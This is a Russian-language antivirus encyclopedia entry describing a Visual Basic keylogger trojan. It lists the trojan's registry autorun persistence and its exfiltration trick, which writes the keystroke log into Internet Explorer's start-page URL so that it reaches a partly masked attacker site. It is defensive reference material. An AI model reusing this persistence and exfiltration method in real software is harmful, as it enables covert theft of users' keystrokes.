Trojan-Spy.Win32. VB.m

Троянская программа — клавиатурный шпион. Является приложением Windows (PE EXE-файл). Имеет размер 36864 байта. Написана на Visual Basic.

Инсталляция

После запуска троянец копирует свое тело в корневой каталог Windows под именем «SYSEDIT.EXE»:

  %WinDir%\SYSEDIT.EXE

С целью автоматического запуска при каждом последующем старте системы троянец добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:

  [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
  "sysedit" = "%WinDir%\SYSEDIT.EXE"
  

Деструктивная активность

Троянская программа отслеживает нажатия клавиш клавиатуры. Для сохранения и отправки похищаемых данных злоумышленнику используется ключ системного реестра, отвечающий за стартовую страницу браузера Internet Explorer:

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = http://www.***sch.com/test/test.php?page=%current_start_page%&text=%log%

При загрузке браузера открывается сайт злоумышленника, затем происходит редирект на обычную стартовую страницу пользователя. При этом в качестве параметра «text» на сайт злоумышленника передается собранная информация о клавиатурном вводе. После успешной передачи данных лог обнуляется.

Другие названия

Trojan-Spy.Win32.VB.m («Лаборатория Касперского») также известен как: TrojanSpy.Win32.VB.m («Лаборатория Касперского»), PWS-RedNeck (McAfee), PWSteal.Trojan (Symantec), BackDoor.Frestr (Doctor Web), TrojanSpy:Win32/VB.M (RAV), TROJ_VB.M (Trend Micro), TR/SPY.VB.m (H+BEDV), Win32:Trojan-gen. (ALWIL), Trojan.Spy.VB.M (SOFTWIN), Backdoor Program (Panda), Win32/Spy.VB.M (Eset)